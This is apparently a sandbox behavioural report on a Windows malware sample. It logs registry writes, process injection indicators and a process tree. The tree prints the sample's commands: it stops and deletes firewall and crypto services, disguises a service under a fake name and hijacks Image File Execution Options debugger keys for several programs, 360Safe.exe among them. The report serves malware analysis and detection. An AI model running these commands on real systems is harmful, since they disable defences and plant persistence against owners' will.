Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\Control	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\NTService.Control.1\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}\ = "_DNtSvc"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}\ProxyStubClsid32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\MiscStatus\1	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\ = "NT Service Control"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\MiscStatus\ = "0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\MiscStatus\1\ = "199824"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}\ = "_DNtSvcEvents"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib\ = "{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}\1.0\HELPDIR\ = "C:\\Windows\\SysWOW64"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}\ = "_DNtSvc"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}\1.0\0\win32\ = "C:\\Windows\\SysWOW64\\NTSVC.ocx"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}\1.0\HELPDIR	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}\ProxyStubClsid32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}\1.0	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}\1.0\ = "Microsoft NT Service Control"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}\1.0\FLAGS	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\Version\ = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}\1.0\FLAGS\ = "2"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\NTService.Control.1	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib\ = "{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}\ = "_DNtSvcEvents"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib\ = "{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\InprocServer32\ = "C:\\Windows\\SysWOW64\\NTSVC.ocx"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\Control\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib\ = "{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\NTService.Control.1\CLSID\ = "{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib\ = "{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}\1.0\0	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\ToolboxBitmap32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7BC34A0-BA86-11CF-84B1-CBC2DA68BF6C}\1.0\0\win32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A2-BA86-11CF-84B1-CBC2DA68BF6C}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\ProgID\ = "NTService.Control.1"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\MiscStatus	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E7BC34A1-BA86-11CF-84B1-CBC2DA68BF6C}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\ProgID	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\Version	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
760	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
2508	svchost.exe
2508	svchost.exe
2164	svchost.exe
2164	svchost.exe
760	svchost.exe
760	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1960 wrote to memory of 1324	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	30
PID 1960 wrote to memory of 1324	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	30
PID 1960 wrote to memory of 1324	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	30
PID 1960 wrote to memory of 1324	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	30
PID 1960 wrote to memory of 2480	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	32
PID 1960 wrote to memory of 2480	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	32
PID 1960 wrote to memory of 2480	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	32
PID 1960 wrote to memory of 2480	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	32
PID 2480 wrote to memory of 2476	2480	cmd.exe	34
PID 2480 wrote to memory of 2476	2480	cmd.exe	34
PID 2480 wrote to memory of 2476	2480	cmd.exe	34
PID 2480 wrote to memory of 2476	2480	cmd.exe	34
PID 2480 wrote to memory of 2476	2480	cmd.exe	34
PID 2480 wrote to memory of 2476	2480	cmd.exe	34
PID 2480 wrote to memory of 2476	2480	cmd.exe	34
PID 1960 wrote to memory of 2508	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	35
PID 1960 wrote to memory of 2508	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	35
PID 1960 wrote to memory of 2508	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	35
PID 1960 wrote to memory of 2508	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	35
PID 2508 wrote to memory of 2304	2508	svchost.exe	36
PID 2508 wrote to memory of 2304	2508	svchost.exe	36
PID 2508 wrote to memory of 2304	2508	svchost.exe	36
PID 2508 wrote to memory of 2304	2508	svchost.exe	36
PID 2508 wrote to memory of 2244	2508	svchost.exe	37
PID 2508 wrote to memory of 2244	2508	svchost.exe	37
PID 2508 wrote to memory of 2244	2508	svchost.exe	37
PID 2508 wrote to memory of 2244	2508	svchost.exe	37
PID 2508 wrote to memory of 2780	2508	svchost.exe	39
PID 2508 wrote to memory of 2780	2508	svchost.exe	39
PID 2508 wrote to memory of 2780	2508	svchost.exe	39
PID 2508 wrote to memory of 2780	2508	svchost.exe	39
PID 2508 wrote to memory of 2812	2508	svchost.exe	40
PID 2508 wrote to memory of 2812	2508	svchost.exe	40
PID 2508 wrote to memory of 2812	2508	svchost.exe	40
PID 2508 wrote to memory of 2812	2508	svchost.exe	40
PID 1960 wrote to memory of 2628	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	44
PID 1960 wrote to memory of 2628	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	44
PID 1960 wrote to memory of 2628	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	44
PID 1960 wrote to memory of 2628	1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe	44
PID 2164 wrote to memory of 2616	2164	svchost.exe	47
PID 2164 wrote to memory of 2616	2164	svchost.exe	47
PID 2164 wrote to memory of 2616	2164	svchost.exe	47
PID 2164 wrote to memory of 2616	2164	svchost.exe	47
PID 2164 wrote to memory of 1488	2164	svchost.exe	48
PID 2164 wrote to memory of 1488	2164	svchost.exe	48
PID 2164 wrote to memory of 1488	2164	svchost.exe	48
PID 2164 wrote to memory of 1488	2164	svchost.exe	48
PID 2164 wrote to memory of 668	2164	svchost.exe	49
PID 2164 wrote to memory of 668	2164	svchost.exe	49
PID 2164 wrote to memory of 668	2164	svchost.exe	49
PID 2164 wrote to memory of 668	2164	svchost.exe	49
PID 2164 wrote to memory of 1332	2164	svchost.exe	50
PID 2164 wrote to memory of 1332	2164	svchost.exe	50
PID 2164 wrote to memory of 1332	2164	svchost.exe	50
PID 2164 wrote to memory of 1332	2164	svchost.exe	50
PID 2164 wrote to memory of 1652	2164	svchost.exe	54
PID 2164 wrote to memory of 1652	2164	svchost.exe	54
PID 2164 wrote to memory of 1652	2164	svchost.exe	54
PID 2164 wrote to memory of 1652	2164	svchost.exe	54
PID 1652 wrote to memory of 1780	1652	cmd.exe	57
PID 1652 wrote to memory of 1780	1652	cmd.exe	57
PID 1652 wrote to memory of 1780	1652	cmd.exe	57
PID 1652 wrote to memory of 1780	1652	cmd.exe	57
PID 1652 wrote to memory of 1144	1652	cmd.exe	58

Views/modifies file attributes 1 TTPs 48 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2428	attrib.exe
1596	attrib.exe
1588	attrib.exe
2480	attrib.exe
1900	attrib.exe
2420	attrib.exe
1744	attrib.exe
2188	attrib.exe
2100	attrib.exe
1976	attrib.exe
2052	attrib.exe
2856	attrib.exe
764	attrib.exe
788	attrib.exe
2300	attrib.exe
2004	attrib.exe
1592	attrib.exe
1692	attrib.exe
532	attrib.exe
2764	attrib.exe
760	attrib.exe
608	attrib.exe
1848	attrib.exe
880	attrib.exe
1716	attrib.exe
776	attrib.exe
2472	attrib.exe
1036	attrib.exe
2184	attrib.exe
2404	attrib.exe
2352	attrib.exe
1308	attrib.exe
1756	attrib.exe
2512	attrib.exe
2236	attrib.exe
2200	attrib.exe
2024	attrib.exe
2232	attrib.exe
1636	attrib.exe
2192	attrib.exe
1972	attrib.exe
2272	attrib.exe
2396	attrib.exe
1748	attrib.exe
1968	attrib.exe
2400	attrib.exe
952	attrib.exe
2196	attrib.exe

C:\Users\Admin\AppData\Local\Temp\39dfbdc595913049289f361352e20211_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\39dfbdc595913049289f361352e20211_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1960
- C:\Users\Admin\AppData\Local\Temp\IExp1orer.exe
  IExp1orer stop Microsoftword
  2⤵
  - Executes dropped EXE
  PID:1324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c regsvr32 /s NTSVC.ocx
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2480
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 /s NTSVC.ocx
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:2476
- C:\Windows\inf\svchost.exe
  C:\Windows\inf\svchost.exe /install
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\inf\IExp1orer.exe
    IExp1orer stop sharedaccess
    3⤵
    - Executes dropped EXE
    PID:2304
- - C:\Windows\inf\IExp1orer.exe
    IExp1orer delete sharedaccess
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2244
- - C:\Windows\inf\IExp1orer.exe
    IExp1orer stop cryptsvc
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2780
- - C:\Windows\inf\IExp1orer.exe
    IExp1orer delete cryptsvc
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2812
- C:\Users\Admin\AppData\Local\Temp\IExp1orer.exe
  IExp1orer start Microsoftword
  2⤵
  - Executes dropped EXE
  PID:2628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\stopmssql.bat
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2392
- - C:\Users\Admin\AppData\Local\Temp\IExp1orer.exe
    IExp1orer stop MSSQLSERVER
    3⤵
    - Executes dropped EXE
    PID:1716
- - C:\Windows\SysWOW64\whw.exe
    whw stop MSSQLSERVER /Y
    3⤵
    - Executes dropped EXE
    PID:1588
- - C:\Users\Admin\AppData\Local\Temp\IExp1orer.exe
    IExp1orer stop microsoftsqlserver /yes
    3⤵
    - Executes dropped EXE
    PID:2060
- - C:\Windows\SysWOW64\whw.exe
    whw stop microsoftsqlserver /yes
    3⤵
    - Executes dropped EXE
    PID:2756
- - C:\Windows\SysWOW64\whw.exe
    whw stop mssqlserver /yes
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\whw.exe
    whw start microsoftsqlserver /yes
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\whw.exe
    whw start MSSQLSERVER /Y
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\whw.exe
    whw start MSSQLSERVER /Y
    3⤵
    PID:324
- - C:\Windows\SysWOW64\whw.exe
    whw stop mssqlserver /yes
    3⤵
    PID:912
- - C:\Windows\SysWOW64\whw.exe
    whw start microsoftsqlserver /yes
    3⤵
    PID:1856
- - C:\Windows\SysWOW64\whw.exe
    whw start MSSQLSERVER /Y
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\whw.exe
    whw start MSSQLSERVER /Y
    3⤵
    PID:1084
- C:\Windows\inf\svchost.exe
  C:\Windows\inf\svchost.exe /install
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:760
- - C:\Windows\inf\IExp1orer.exe
    IExp1orer stop sharedaccess
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:444
- - C:\Windows\inf\IExp1orer.exe
    IExp1orer delete sharedaccess
    3⤵
    - Executes dropped EXE
    PID:1140
- - C:\Windows\inf\IExp1orer.exe
    IExp1orer stop cryptsvc
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1504
- - C:\Windows\inf\IExp1orer.exe
    IExp1orer delete cryptsvc
    3⤵
    - Executes dropped EXE
    PID:1136
- C:\Users\Admin\AppData\Local\Temp\IExp1orer.exe
  IExp1orer start Microsoftword
  2⤵
  - Executes dropped EXE
  PID:2296
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\error.bat
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2404
- - C:\Users\Admin\AppData\Local\Temp\IExp1orer.exe
    IExp1orer config "Microsoftword" DisplayName= "Windows Instrumentations Management"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\IExp1orer.exe
    IExp1orer description Microsoftword "Configure the hard disk drives and volume. This services is only configured to deal with running, then terminates."
    3⤵
    - Executes dropped EXE
    PID:2476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\dm.bat""
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  PID:1996
- C:\Users\Admin\AppData\Local\Temp\IExp1orer.exe
  IExp1orer config Microsoftword start= auto
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1760

C:\Windows\inf\svchost.exe
C:\Windows\inf\svchost.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2164
- C:\Windows\inf\IExp1orer.exe
  IExp1orer stop sharedaccess
  2⤵
  - Executes dropped EXE
  PID:2616
- C:\Windows\inf\IExp1orer.exe
  IExp1orer delete sharedaccess
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1488
- C:\Windows\inf\IExp1orer.exe
  IExp1orer stop cryptsvc
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:668
- C:\Windows\inf\IExp1orer.exe
  IExp1orer delete cryptsvc
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\inf\endexe.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1652
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3389.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:1780
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cike.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:1144
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ft.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:572
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csc.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:1956
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nt.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:1792
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aio.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:1996
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\all.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:1760
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\p.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2920
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\00.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:2904
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:2880
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\0419.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:2632
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ant.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:2560
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:1668
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\119.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2892
